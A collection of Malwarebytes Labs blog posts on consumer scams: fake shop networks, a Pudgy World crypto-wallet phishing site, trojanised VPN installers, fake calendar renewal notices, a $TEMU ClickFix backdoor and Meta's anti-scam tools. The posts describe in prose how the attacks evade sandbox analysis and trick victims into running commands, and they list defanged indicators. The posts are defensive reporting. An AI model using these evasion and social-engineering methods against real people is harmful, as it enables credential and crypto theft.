  • If you don’t trust a website, ask Malwarebytes Scam Guard for its opinion. It’s very good at sniffing out scams.

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

Inside a network of 20,000+ fake shops

18 March 2026 at 09:51

We mapped a sprawling fake shop operation of over 20,000 domains, dozens of shared IP addresses and identical storefronts with different names pasted on top. They exist for one purpose: to steal your payment details and personal data. The thread that ties them all together is a browser tab title most people would never think twice about: “Unrivaled selection only for you.

Polished storefronts, empty warehouses

Fake shops are fraudulent websites designed to look and feel like legitimate online retailers. They have product listings, brand logos, customer reviews, shopping carts, and functional-looking checkout pages. They just never deliver what they promise. In some cases, victims receive nothing at all. In others, they get a cheap knockoff worth a fraction of the advertised price.

Either way, the product being sold is your data: these fake shops harvest your payment credentials, billing addresses, and personal details and then resell them on criminal marketplaces or use them directly for identity fraud.

The scale of the problem has exploded. According to recent threat intelligence data, fake e-shop scams rose by 790% in the first quarter of 2025 compared to the same period the year before, driven in part by economic anxiety around trade tariffs pushing consumers toward bargain alternatives.

During the 2024 holiday season alone, researchers identified over 80,000 fake stores, many of which disappeared or rebranded within days. Industry telemetry from late 2025 found that fake shops accounted for 65% of all threats blocked on social media, with Facebook and YouTube as the primary launchpads.

These operations are increasingly industrialized. Researchers recently documented FraudWear, a coordinated campaign involving over 30,000 fraudulent stores impersonating more than 350 fashion brands worldwide.

Another investigation uncovered BogusBazaar, a franchise-style network where a core team maintained the servers, payment processing, and template infrastructure, while decentralized operators spun up individual shops on top of it. That network processed over a million orders across 75,000 domains since 2021.

Fake shops succeed because they use familiar shopping behavior: clicking on ads, following search results, and landing on polished-looking sites. They layer psychological pressure on top, with limited-time offers, countdown timers, and disappearing stock warnings.

Same storefront, different names

While investigating suspicious e-commerce domains, we identified a cluster of more than 20,000 sites sharing common infrastructure patterns.

Most used the .shop top-level domain (TLD), which has become a favourite among scammers thanks to cheap registration fees and a plausible-looking name. The .shop extension now ranks among the top TLDs associated with spam and malicious activity, according to Cloudflare’s email security data.

Digging into the page source revealed what ties these sites together. All run on WordPress and are powered by Sellvia, a legitimate US-based e-commerce platform that allows users to launch a dropshipping store quickly with ready-made templates, product catalogs, and payment processing.

The storefronts reuse Sellvia’s themes and pull product images from its network. The six “different” templates we observed are really just two base themes with cosmetic variations. Here are some examples, shown in pairs to illustrate how the same template appears under completely different brand names.

Left ImageRight Image
Left ImageRight Image
Left ImageRight Image
Left ImageRight Image
Left ImageRight Image
Left ImageRight Image

20,000 domains, 36 IP addresses

Behind the visual similarities, these fake shops share a common infrastructure backbone. All 20,000+ domains resolve to a set of just 36 IP addresses.

That level of concentration isn’t typical for legitimate online retailers. It’s a hallmark of bulk fraud operations where one group manages the servers and templates while individual operators spin up domains on top.

Much of this activity clusters around a small number of IP ranges, including blocks in the 207.244.x.x and 23.105.x.x space. That clustering points to a preference for specific hosting providers, and a setup designed for speed: spin up a domain, attach a template, go live.

This mirrors the franchise-style model seen in other fake shop networks. A core group manages the servers, templates, and payment setup, while operators register domains and launch storefronts on top. When one site is flagged or taken down, another takes its place.

But the same clustering is also a weakness. Disrupt a small number of servers, and you can take thousands of sites offline.

How to stay safe from fake shops

These fake shops aren’t independent businesses. They’re part of large, repeatable operations designed to look convincing, move fast, and disappear just as quickly.

If a site feels unfamiliar, rushed, or too good to be true, treat it that way. A few extra seconds of checking can save you from handing over your money and your data to cybercriminals.

  • Use browser protection. Tools like Malwarebytes Browser Guard can block known scam sites before you ever reach checkout.
  • Check the domain carefully. Be cautious with unfamiliar endings like .shop, .top, .store, and .xyz, especially when paired with generic, brand-sounding names. If you’ve never heard of the retailer, that’s your first signal.
  • Be skeptical of deep discounts. If an item is sold out everywhere else but heavily discounted on one unknown site, it’s bait.
  • Watch for copy-paste storefronts. If multiple sites have identical layouts, product images, and banners under different names, they’re likely using the same template. Legitimate stores don’t operate like that.
  • Look for independent reviews. Search the store name with terms like “review” or “scam.” If the only results are the site itself, that tells you something.
  • Don’t ignore your instincts. If something feels off, stop. Don’t enter your payment details just to “see what happens.”
  • Use safer payment methods. Credit cards offer better protection than debit. Virtual cards or payment services can add an extra layer between your details and the seller.

Pro tip: Malwarebytes blocks these domains as fraudulent.

Indicators of Compromise (IOCs)

IP addresses

  • 108[.]59[.]1[.]151
  • 108[.]59[.]12[.]118
  • 108[.]59[.]14[.]13
  • 108[.]59[.]8[.]97
  • 108[.]62[.]0[.]220
  • 108[.]62[.]116[.]82
  • 108[.]62[.]117[.]45
  • 162[.]210[.]195[.]105
  • 162[.]210[.]195[.]113
  • 162[.]210[.]198[.]37
  • 162[.]210[.]199[.]12
  • 162[.]210[.]199[.]183
  • 162[.]210[.]199[.]235
  • 192[.]96[.]200[.]81
  • 198[.]7[.]58[.]168
  • 198[.]7[.]58[.]87
  • 199[.]115[.]115[.]2
  • 207[.]244[.]102[.]13
  • 207[.]244[.]109[.]109
  • 207[.]244[.]126[.]106
  • 207[.]244[.]126[.]19
  • 207[.]244[.]126[.]21
  • 207[.]244[.]67[.]158
  • 207[.]244[.]69[.]201
  • 207[.]244[.]71[.]143
  • 207[.]244[.]89[.]198
  • 207[.]244[.]91[.]203
  • 23[.]105[.]160[.]43
  • 23[.]105[.]172[.]14
  • 23[.]105[.]8[.]15
  • 23[.]105[.]8[.]17
  • 23[.]105[.]8[.]19
  • 23[.]82[.]11[.]26
  • 23[.]82[.]13[.]161
  • 23[.]82[.]13[.]34
  • 5[.]79[.]69[.]45

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

Fake Pudgy World site steals your crypto passwords

17 March 2026 at 17:10

A phishing site impersonating the newly-launched Pudgy World browser game is targeting crypto users with a technique that goes well beyond a convincing logo and matching color scheme.

Pudgy World is a free-to-play browser game built around the Pudgy Penguins NFT brand. Players explore a virtual world, customize penguin avatars, and complete quests. But some features are tied to digital collectibles and in-game items stored in cryptocurrency wallets.

That means the official game sometimes asks players to connect a crypto wallet to verify ownership of items or unlock additional features. The phishing site abuses that step: When a visitor selects their wallet on this fake site, it shows what appears to be that wallet’s own unlock screen. To the user, it looks for all the world like the real crypto wallet software they already trust.

Phishing site impersonating the Pudgy World site.
Phishing site impersonating the Pudgy World site.

“Connect your wallet to get started”

The Pudgy Penguins brand has had an extraordinary few months. The penguin NFT project, revived by CEO Luca Netz after he acquired it in 2022, has steadily built one of the most convincing crossover stories in Web3: physical plush toys on Walmart and Target shelves, a mobile game called Pudgy Party that crossed a million downloads, and a browser-based game called Pudgy World that went live on 10 March 2026 to immediate viral attention.

The official game asks players to connect a crypto wallet to get started. That text: “Connect your wallet to get started” is now appearing, verbatim, on a site that has nothing to do with Pudgy Penguins.

The domain in question is pudgypengu-gamegifts[.]live. It is not affiliated with Igloo Inc., the company behind Pudgy Penguins, in any way. The site reproduces the official game’s icy background artwork, the Pudgy Penguins logo, and the brand’s characteristic blue-and-white color palette with enough fidelity that a user arriving during the excitement of a new game launch would have no obvious reason for suspicion.

Eleven wallets, eleven convincing forgeries

Selecting a wallet here triggers the fake wallet interface.
Selecting a wallet here triggers the fake wallet interface.

Clicking the CONNECT button opens a dark-themed pop-up window built to resemble the Reown WalletConnect connection kit—the open-source library that the real Pudgy World site uses to handle wallet connections. The modal even displays the “reown” and “Manual Kit” tab labels at the top, matching the genuine component.

Inside is a list of supported wallets:

MetaMask (marked “RECOMMENDED”), Trust Wallet, Coinbase Wallet, Ledger, Trezor Wallet, Phantom Wallet, Rabby Wallet, OKX Wallet, Magic Eden, Solflare, and Uniswap Wallet.

The attack becomes technically interesting at the next step.

Selecting a software wallet does not redirect the user to another page or open an external site. Instead, the page renders an overlay designed to look like the wallet’s actual browser extension unlock screen. The overlay appears at the edge of the browser viewport right where a real extension popup would appear.

Hardware wallet flows behave differently. Selecting Trezor Wallet opens a center-screen dialog mimicking the Trezor Connect interface, rather than a corner overlay. In both cases, the result is that the user believes they are looking at their own installed software, when they are in fact looking at a webpage element controlled by the attacker.

The forgery sits exactly where your real extension would

For every browser extension wallet on the list, the phishing site renders an unlock screen built to match the real extension’s own visual identity, with the correct logo, color scheme, button layout, and wording.

The screenshots below show the forgeries alongside the genuine extensions. The differences are not visible to someone who is not looking for them.

  • Fake extension
    Fake extension
  • Real extension
    Real extension
  • Fake extension
    Fake extension
  • Real extension
    Real extension

  • Fake site
    Fake extension
  • Real extension
    Real extension

Hardware wallet users are not exempt, and the targeting of Trezor is particularly telling.

Trezor devices are typically owned by people who have been in crypto long enough to invest in dedicated security hardware. In other words, users likely holding higher-value accounts.

Selecting Trezor Wallet on the phishing site triggers a dialog that closely mimics the Trezor Connect bridge interface. At the same time, the browser displays a native USB device permission prompt—the operating system’s own dialog, triggered by a WebUSB API call—reading “pudgypengu-gamegifts.live wants to connect.”

The prompt says “No compatible devices found” if no Trezor is plugged in, but the sequence is designed to look like a genuine hardware handshake.

A user who plugs in their Trezor at this point and approves the USB permission has granted the phishing site access to the device bridge.

For those without a device to hand, the dialog offers another option: “Use an alternative connection method.” That path is likely where the most damage is done. A user who cannot get the hardware flow to work and falls back to a manual option is one step away from being asked to type in their seed phrase, the master key to everything in their wallet, directly into a field the attacker controls.

“No compatible devices found.”

The page that plays dead for researchers

The phishing page is more cautious than it first appears.

Embedded in the site is an obfuscated JavaScript loader, its real contents compressed and hidden behind multiple layers of encoding, that performs a series of checks before doing anything visible.

First, it tests whether the browser is being driven by an automated tool of the kind security researchers and sandboxes use to analyse suspicious pages in bulk. If it detects one, it quietly stops and the page appears clean.

Next, it reads the graphics hardware identifier to determine whether it is running inside a virtual machine, which is another common analysis environment.

Only once it is satisfied that a real user is present does it request a second, larger payload from the attacker’s server. That payload contains the code responsible for credential theft.

Even that request contains a safeguard. If the server response is smaller than 500 KB (the kind of placeholder response a security vendor might serve to a known malicious domain), the loader discards it and does nothing.

The practical consequence of all this is that automated scanning tools are likely to rate the initial page as benign, because on their infrastructure, it behaves like one. The malicious functionality never loads unless the attacker’s server decides the visitor is worth targeting.

Why this campaign targets Pudgy players

The timing seems to be deliberate. Pudgy World launched on March 10, 2026, and the phishing campaign appears to have been active around the same window. New players arriving at the game for the first time are walking through a Web3 onboarding flow they have never experienced before.

The legitimate “connect your wallet” step on the official site teaches users that this behaviour is normal. The phishing site then exploits that expectation before experience can challenge it.

The range of wallets targeted is also significant. The campaign leaves almost no wallet blind spot. Whether the victim holds Ethereum, Solana, or multi-chain assets, there is a convincing forgery waiting for them. Building 11 wallet-specific UI forgeries is not a trivial undertaking. It points either to a well-resourced threat actor or, more likely, to the reuse of a commercial phishing kit built for precisely this class of attack.

What to do if you may have been affected

Crypto phishing campaigns have long relied on fake airdrops and fake MetaMask pages. This campaign stands out for how precisely it imitates a wallet’s unlock screen, placing the prompt exactly where a real extension pop-up would appear and exploiting users’ muscle memory.

The attack also piggybacks on Pudgy World’s launch. As Web3 products reach wider audiences, they attract attackers targeting users unfamiliar with wallet security.

One rule still holds: a website can never display your real browser extension unlock screen.

  • If you entered your MetaMask, Coinbase Wallet, or any other software wallet password on this site, change your password immediately by unlocking the extension normally and going to Settings. Consider transferring assets to a new wallet address whose seed phrase has never been used on any website.
  • If you approved the USB device permission prompt for Trezor, disconnect your device and review your Trezor Suite connection history. A WebUSB connection alone does not expose your seed phrase, but it can allow a malicious page to communicate with the bridge. Revoke the permission in your browser’s site settings immediately.
  • Bookmark the official Pudgy Penguins site (pudgypenguins.com) and the official game URL. Navigate to it directly from that bookmark, never from a link in Discord, Twitter, or a direct message.
  • Install a browser extension that flags known phishing domains before you interact with them. Malwarebytes Browser Guard will block this domain.
  • Remind yourself of this rule: your wallet’s unlock screen always appears in the bar at the very top of the window, not inside the page itself. Any page that appears to show you your wallet’s password prompt inside the page content is a phishing site.

Indicators of Compromise (IOCs)

Domains

  • pudgypengu-gamegifts[.]live

How searching for a VPN could mean handing over your work login details

17 March 2026 at 12:36

This blog is about how trying to do the “right thing” can lead you straight into a trap. People searching for a VPN ended up downloading credential-stealing malware.

From the victim’s perspective, their trust was exploited at every step: trust in search engines, in familiar logos, in digital signatures, and in the assumption that if things “work in the end,” they must be safe.

Imagine you’re looking for a VPN client to connect to your employer’s network. You use your favorite search engine and, at the top of the search results, you see exactly what you were looking for: listings that look like they belong to established names in the industry. They have the right logo, the right product name, and a description that sounds legitimate.

But what you’re looking at, in the cases Microsoft describes, are search results influenced by SEO poisoning. Search engine optimization (SEO) poisoning comes down to getting a web page to rank highly for relevant search results without buying ads or following legitimate, but tedious, SEO best practices. Instead, cybercriminals use deceptive or outright illegal means to push their pages to the top.

On the spoofed—maybe even cloned—VPN page, everything looks familiar: the vendor branding, product name, and a short blurb about secure remote access. Most importantly, there’s a prominent Download button. You click, expecting an installer from a reputable vendor, but the site quietly redirects you to a GitHub release download instead, offering a ZIP file called something along the lines of VPN-CLIENT.zip.

GitHub is a favorite distribution channel for malware authors because it’s widely trusted. In this campaign, the criminals even signed their file with a legitimate certificate, which has since been revoked. The downloaded ZIP file contains a Microsoft Software Installer (.msi) file that takes the victim through the usualy Install, Next, Next, Finish routine, while side-loading malicious dynamic link library (DLL) files during the installation.

One of those DLLs, dwmapi.dll, is acting as a loader, launching embedded shellcode that in turn runs inspector.dll, a variant of the Hyrax infostealer. From the moment the install finishes, your VPN client is not just a client but also a credential thief.

When you start using your new VPN, several things happen in quick succession:

  • The fake VPN client captures your username, password, and target URI, and hands this data to the Hyrax infostealer component.
  • Hyrax also reads existing VPN configuration data, scooping up any stored connections and saved credentials.
  • The malware sends all the stolen information to attacker‑controlled infrastructure.

All the user sees is a plausible‑sounding error like “connection failed” or “installation problem.” To top things off, the malware provides instructions to download the legitimate VPN client from official sources. In certain instances, it even opens the user’s browser to the real VPN website. All this, of course, to alleviate suspicion.

The rest happens on the employer’s network. The attacker can now log into the corporate VPN as you, from infrastructure they control, and immediately blend in with normal remote access traffic. If your account has access to file shares, internal admin panels, ticketing systems, or cloud services, they can start exploring or abusing these resources.

How to stay away from fake VPN clients

Now that you know what to look for, you’re already one step ahead. Here are some more general tips to stay safe:

  • Never trust search results alone, especially for security software. Go straight to the vendor’s website.
  • Double‑check the domain before downloading. Are you still on the vendor’s site or a trusted platform? If needed, verify the download link with your IT department.
  • Report “failed” VPN installs to IT. Don’t keep retrying. An unexpected failure followed by a redirect should raise a red flag.
  • Don’t store corporate VPN credentials in personal password managers or browsers.

If you’ve ever installed a VPN client from an untrusted site or an unusual domain, assume your VPN credentials may be compromised and request a reset.


We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

A week in security (March 9 – March 15)

16 March 2026 at 08:16

Last week on Malwarebytes Labs:

Stay safe!


We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

Watch out for fake Malwarebytes renewal notices in your calendar

13 March 2026 at 16:48

We’ve become aware of a scam campaign sending fake calendar invites that impersonate Malwarebytes and attempt to trick recipients into calling a scam “billing support” number. 

We have written before about how calendar invites can be abused for phishing, and even about how Google Calendar invites can be weaponized to steal private data

The amounts in these fake invites are large and attention-grabbing, usually several hundred dollars for multiple years of service.  

The scammers want you to believe a considerable charge has already gone through so that you react immediately instead of thinking critically. 

The goal is to get you to call, rather than click a link. The calendar description reads like a receipt, but the real call to action is always the same: urging you to call a number immediately to dispute or cancel the charge. m

Once you call, the scammer can pressure you in real time. They might ask for payment details, convince you to install remote-access software, or manipulate you into sending money. 

What the fake calendar invite looks like 

Text from the fake calendar invite
Text from the fake calendar invite

The body of the calendar invite is crammed with fake details intended to look like they came from a billing system: 

  • Multiple ID lines, such as Membership ID, Client UID, Customer ID, Service Number
  • A string of made-up transaction or account codes
Text from the fake calendar invite
This one even sells a product that isn’t in our portfolio

The language and formatting scream copied-and-pasted scam script rather than professional communication. 

There are several inconsistencies you can look for: 

Unnatural or incorrect phrasing: 

  • “Membership Duration: 4yrold” 
  • “We’re thrilled to have you with us for another year!” (in a 4-year renewal notice) 
  • “Your membership benefits remain fully active.” 

Inconsistent capitalization and formatting: 

  • “FOUR YEAR (All Caps)” 
  • “04 Year” 
  • “USD344.55” 

Phone numbers written with odd punctuation:  

  • 1.810.228.8708  
  • 1 865 3849684 

Overly effusive, generic greetings and closings: 

  • “Dear Sir/Madam,” “Greetings to all,” “Hello there”
  • “Yours in Respect,” “Much Gratitude,” “Always Appreciative,” “With Joy, best regards,” 

Individually, any one of these might just be sloppy writing. Seeing many of them together in an unsolicited billing notice is a strong indicator of fraud. 

What happens if you call the number 

The calendar invite itself doesn’t charge you anything. Its purpose is to trick you into calling the scammer’s phone number.  

Once they have you on the line, several things can happen. 

Stealing payment card and bank details 

A common script goes like this: 

You call, upset about the huge “renewal.” 

The scammer agrees it’s a mistake and says they can “reverse the charge.” 

They then ask for: 

  • Your full card number, expiry date, and CVV. 
  • Your bank account and routing number. 
  • One-time passcodes sent by your bank “to confirm the refund.” 

Once they have that information, they can: 

  • Make unauthorized purchases or withdrawals. 
  • Enroll you in other fraudulent subscriptions. 
  • Use your card details for further identity theft. 

The phony renewal is just a pretext to make handing over financial data feel reasonable. 

Convincing you to send money directly 

In some versions, the scammer pretends to refund you too much. They may: 

  • Ask you to log in to online banking while they’re on the phone. 
  • Direct you to move money or manipulate your account, sometimes with remote-access software. 
  • Claim there’s been an error, and you must “return” the over-refund, often via unusual methods like gift cards, cryptocurrency, wire transfer, or peer-to-peer payment apps. 

The result is that you send them real money to fix a problem that never existed. 

Getting remote access to your computer 

Tech support-style scammers often escalate the call by asking you to install legitimate remote-access tools like AnyDesk, TeamViewer, and others. 

They claim they need access: 

  • to cancel the subscription 
  • to verify your account 
  • or to help you process the refund 

Once on your machine, they can: 

  • Capture passwords and session cookies
  • Move files or install malware
  • Manipulate what you see in your browser (for example, by editing HTML to “prove” a refund went through)

The longer they stay connected, the more damage they can do. 

Harvesting personal information for later fraud 

Even if you hang up before giving bank details, the scammer may still try to extract: 

  • Full name, address, and date of birth 
  • Email addresses and passwords to “locate your account”
  • Answers to common security questions (first school, mother’s maiden name, etc.)

Combined with other breached data, this information can be used later for: 

  • New account fraud (like opening loans or credit cards in your name)
  • Account takeovers of your email, cloud storage, or other services
  • Targeted phishing attacks that reference the earlier call

Building trust for future scams 

Don’t be fooled. The person on the phone will usually sound patient, polite, and professional. They’re trying to convince you they work for the company named in the invite and normalize the idea that you should call them any time there’s a billing issue. 

Once they’ve gained your trust, they may: 

  • Call you back weeks or months later with a new story
  • Sell your details to other scammers who know you’re likely to respond

The one constant: they want you to act quickly and privately. The objective is to rush you into dealing with them, and only them, instead of checking independently with your bank or the real company. 

How to recognize calendar scams 

Legitimate companies send invoices and renewal confirmations as emails, in-app messages, or account notifications. They don’t send them as calendar appointments created by random people using private email addresses. 

Red flags include: 

  • The “bill” appears as an event in Google Calendar, Outlook, or another calendar app. 
  • The title looks like a transaction status instead of a meeting: 
    • “Subscription Renewal Notice: [random code]” 
    • “Payment Processed Successfully: [random code]” 
    • “Renewal Approved: [random code]” 
  • You didn’t schedule this event yourself. 

If a “receipt” shows up in your calendar instead of through your normal billing channels, treat it as suspicious by default. 

How to remove fake entries from your calendar 

We’ve included instructions in our article how to remove fake entries from your calendar, which covers how to do it on Outlook calendar, Gmail calendar, Android calendar, Mac calendar, and iPhone and iPad calendars. 

How to prevent calendar spam 

We’ve covered some of this already, but the main precautions are: 

  • Turn off auto-add or auto-processing so invites stay as emails until you accept them. 
  • Restrict calendar permissions so only trusted people and apps can add events. 
  • In shared or resource calendars, remove public or anonymous access and limit who can create or edit items. 
  • Use an up-to-date real-time anti-malware solution with a web protection component to block known malicious domains. 
  • Don’t engage with unsolicited events. Don’t click links, open attachments, or reply to suspicious calendar events such as “investment,” “invoice,” “bonus payout,” “urgent meeting”—just delete the event. 
  • Enable  multi-factor authentication (MFA) on your accounts so attackers who compromise credentials can’t abuse the account itself to send or auto-accept invitations. 

Pro tip:  If you’re not sure whether an event is a scam, you can paste the message into Malwarebytes Scam Guard. It can help you decide what to do next. 

IOCs 

Phone numbers involved in these scams are: 

  • (810) 228-2614 
  • (810) 228-8708
  • (810) 268-6113 
  • (865) 384-9684
  • (865) 385-0070 

We don’t just report on scams—we help detect them

Cybersecurity risks should never spread beyond a headline. If something looks dodgy to you, check if it’s a scam using Malwarebytes Scam Guard. Submit a screenshot, paste suspicious content, or share a link, text or phone number, and we’ll tell you if it’s a scam or legit. Available with Malwarebytes Premium Security for all your devices, and in the Malwarebytes app for iOS and Android.

Attackers impersonate Temu in ClickFix $Temu airdrop scam

13 March 2026 at 10:30

Update Friday, March 13: A Temu spokesperson contacted us to say: “Temu has not issued any cryptocurrency, token, or digital asset—including any so-called “Temu Coin.” Any airdrop, wallet claim, or cryptocurrency offer purporting to be from Temu is fraudulent and has no connection to our company.”

We’ve covered ClickFix campaigns before: the fake CAPTCHAs, the fake Windows updates, the trick of getting victims to paste malicious commands into their own machines. Now we’ve identified a campaign that uses the opening initial steps seen in ClickFix attacks, but what happens after is different enough to warrant a closer look.

It starts with a convincing fake website promoting a $TEMU airdrop, a fabricated cryptocurrency that uses the name of the well-known shopping platform TEMU. It ends with a remote-access backdoor that checks in with its operators and runs instructions streamed from the internet instead of storing them locally, making it much harder for traditional antivirus tools to detect.

Same opener, different game

Fake $TEMU Airdrop crypto site

If you’ve read our earlier coverage of ClickFix, you know the drill: a webpage that looks like a security check, instructions to press Win+R and paste something, and the user ends up executing a malicious command on their own system. 

This campaign’s lure is a polished fake website that mimics a $TEMU cryptocurrency airdrop. “Discover Exclusive $TEMU Airdrop,” it announces, complete with a logo and navigation bar designed to look like a legitimate crypto project. There is no such coin. The site exists purely to get visitors to click a fake “I’m not a robot” checkbox.

Complete these verification steps

Clicking it triggers a modal titled “Complete these Verification Steps,” which walks the victim through opening a command prompt window using Win+R, then pressing Ctrl+V to paste whatever is waiting on their clipboard and hitting Enter.

For anyone who hesitates, there is a “Video Instructions” button that expands an embedded screen recording demonstrating each keypress in sequence. It’s effectively a help-desk style tutorial guiding victims through executing the attackers’ command. At the bottom of the modal, a fake reCAPTCHA badge reads “Verification ID: 4963,” lending it the appearance of a legitimate security check. What sets this campaign apart is everything that happens after that Enter key is pressed.

First, the malware identifies the host

power

Earlier in the infection chain, the loader collects basic host information and sends it to the command server. The payload returned by the server already contains a unique identifier assigned to the victim machine. In the decoded PowerShell stage, this appears as a variable such as $machine_id, which is embedded directly in the script delivered to the infected system.

Embedding a unique identifier in the returned payload allows the attackers to track individual infections from the moment a machine first checks in. Because this identifier is inserted into the script before it reaches the victim, the server can generate slightly different payloads for different systems.

This matters more than it sounds. Security companies maintain shared databases of known-bad files. When a malicious file is identified, its fingerprint can be added to those databases within hours. If attackers generate slightly different versions of a payload for different victims, traditional file-hash-based detection becomes far less effective because there is no single file signature for defenders to block.

A windowless house guest

With the profiling done, the campaign deploys its backdoor using a bundled Python runtime. This is the same programming language used every day by millions of developers and students. It arrives self-contained, needs no administrator permissions, and does not typically appear as a traditional installed application. The version that actually runs is called pythonw.exe, where the “w” stands for “windowless.” No console, no sound, and nothing in the taskbar.

Earlier Python-based ClickFix campaigns that have been documented delivered a static Python file that performed a fixed task. This campaign appears to take a different approach. Each time the hidden process checks in with the server, it retrieves a new piece of Python code and executes it directly in memory rather than storing it as a persistent script on disk.

This architecture allows the attackers to change the malware’s behavior simply by modifying the code delivered by the server. Different victims can receive different instructions, and the functionality of the infection can be altered without updating anything already present on the compromised machine.

What they can do with an open door

Because the server can send any Python code it likes, the attackers’ capabilities are largely determined by whatever code the command server delivers. In campaigns using similar backdoors, attackers have been observed stealing browser credentials and session cookies, recording keystrokes, taking screenshots, and using the foothold to reach other machines on the same network. The campaign also included infrastructure to notify the attackers via Telegram the moment a new victim checked in—though a debug flag in the decoded payload was set to disabled, suggesting either a campaign in active development or deliberate operational caution.

Python also makes for convenient camouflage. Many corporate security systems include it on their list of trusted applications that are allowed to reach the internet without scrutiny. A Python process sending data outbound can look, at a glance, like a developer running a routine script. Detecting this type of activity typically requires behavior-based monitoring rather than file-signature scanning, making it harder to detect for most security tools.

ClickFix keeps evolving

ClickFix campaigns keep evolving because the core trick sidesteps technical defenses entirely. The victim executes the malicious command themselves.

Earlier this year we covered how attackers switched from PowerShell to nslookup after security software began detecting the original technique. This campaign tackles the same problem from a different angle: instead of changing how the malware is delivered, it tries to ensure there is no stable file left behind.

The backdoor receives instructions dynamically rather than storing them on disk, and the payload can vary for each victim. Without a consistent file to analyze, traditional file-signature detection has much less to work with.

How to stay safe

Here’s some general ClickFix advice that should help you avoid falling victim:

  • Slow down. Don’t rush to follow instructions on a webpage or prompt, especially if it asks you to run commands on your device or copy-paste code. Attackers rely on urgency to bypass your critical thinking, so be cautious of pages urging immediate action. Sophisticated ClickFix pages add countdowns, user counters, or other pressure tactics to make you act quickly.
  • Avoid running commands or scripts from untrusted sources. Never run code or commands copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. Verify instructions independently. If a website tells you to execute a command or perform a technical action, check through official documentation or contact support before proceeding.
  • Limit the use of copy-paste for commands. Manually typing commands instead of copy-pasting can reduce the risk of unknowingly running malicious payloads hidden in copied text.
  • Secure your devices. Use an up-to-date, real-time anti-malware solution with a web protection component.
  • Educate yourself on evolving attack techniques. Understanding that attacks may come from unexpected vectors and evolve helps maintain vigilance. Keep reading our blog!

Pro tip: Did you know that the free Malwarebytes Browser Guard extension warns you when a website tries to copy something to your clipboard?

If you think you’ve been affected

However, if you are past that point and suspect this specific campaign, here is what to check.

  • Look inside %LOCALAPPDATA%\Programs\Python\ for a folder called Python3133 that you did not install. That is the malware’s Python runtime.
  • Open %TEMP% and look for a file called temp_settings. Its presence is the tracking marker this campaign leaves behind.
  • Open Task Manager, go to the Startup tab, and look for pythonw.exe running from an AppData or Program Files\Python3133 location.
  • Change passwords for important accounts from a clean device and revoke active sessions where possible.

Indicators of Compromise (IOCs)

Domains

• temucoin[.]lat


We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Meta rolls out anti-scam tools across WhatsApp, Facebook, and Messenger

12 March 2026 at 10:56

Meta has rolled out more anti-scam protections across WhatsApp, Facebook, and Messenger to fight sophisticated fraud tactics. The features will help stop celebrity impersonators and brand spoofers from defrauding its users, the company said.

Meta is also targeting attackers who exploit legitimate platform features like device linking to hijack accounts. People use this feature to connect more than one of their devices to their account, enabling them to flit between their phone and their computer without skipping a beat.

Scammers fool users into sharing phone numbers and linking codes that then let them link their own malicious devices to the user’s account. They can then access the victim’s messages and send messages impersonating them. Victims usually retain account access, making breaches harder to detect.

More protections in Facebook and Messenger

The protections go beyond WhatsApp. Meta has also deployed AI-powered protections across Facebook and Messenger to catch fraudsters before they hook victims. Facebook will now test warnings for friend requests that seem fishy, flagging profiles with few mutual connections or mismatched locations.

Messenger’s scam detection can also identify patterns like bogus job offers from new contacts. Users can submit suspicious chats for AI review, which analyzes text, images, and contextual signals to spot celebrity impersonation schemes. So if Brad Pitt’s mum appears to be matchmaking, you’ll have a digital wingman to restore your sense of reality.

The new measures also spot brand spoofing and deceptive links, so if someone tries to direct you to a fake website for a well-known company, Meta will do its best to block that.

Malwarebytes users benefit from similar protection through Scam Guard, which analyzes suspicious messages, links, and conversations across multiple platforms, not just one app.

There’s more at play than just altruism

This is part of an ongoing anti-scam campaign by Meta, which launched anti-scam protections on WhatsApp and Messenger last October. It also says that it removed more than 159 million scam ads and dismantled 10.9 million accounts on Facebook and Instagram linked to criminal operations in 2025. It also participated in a global law enforcement operation that arrested 21 suspects and shuttered more than 150,000 accounts linked to Southeast Asian scam networks.

Still, the move may not be entirely altruistic. Regulators have been demanding answers from Facebook about the extent to which it fights scams. Forty-two state attorneys general wrote to the tech giant last June about investment scam ads on its platform. And in November, Consumer Reports asked the FTC and state attorneys to take action against the company over:

“knowingly allowing the proliferation of billions of scam advertisements.”

That request likely stemmed from reports last year suggesting Meta has constrained some anti-scam measures. Reuters reported that the company limited anti-scam enforcement to actions costing no more than 0.15% of total revenue. Internal documents also reportedly estimated that the company received $16bn in revenue from scam ads (an estimate Meta later disputed as “rough and overly inclusive”).

Meta has said it wants 90% of its ad revenue to come from verified advertisers by 2026, up from around 70% today, in an effort to reduce scam advertising on its platforms.

September also saw the European Commission request information from Apple, Booking.com, Bing, Google Play, and Google Search about how they identify and manage risks related to financial scams under the Digital Services Act. While they didn’t explicitly mention Meta, scrutiny about platforms’ scam-fighting efforts in the EU is clearly increasing.

Nevertheless, the new protections arrive at a timely moment. Dutch intelligence recently warned about phishing campaigns targeting government employees through Signal and WhatsApp. The operation relies on social engineering techniques that abuse legitimate authentication features.

Scams continue to bite consumers hard. Americans lost $13.7bn to cyber-enabled fraud in 2024, according to the FBI’s April 2025 Internet Crime Report


We don’t just report on scams—we help detect them

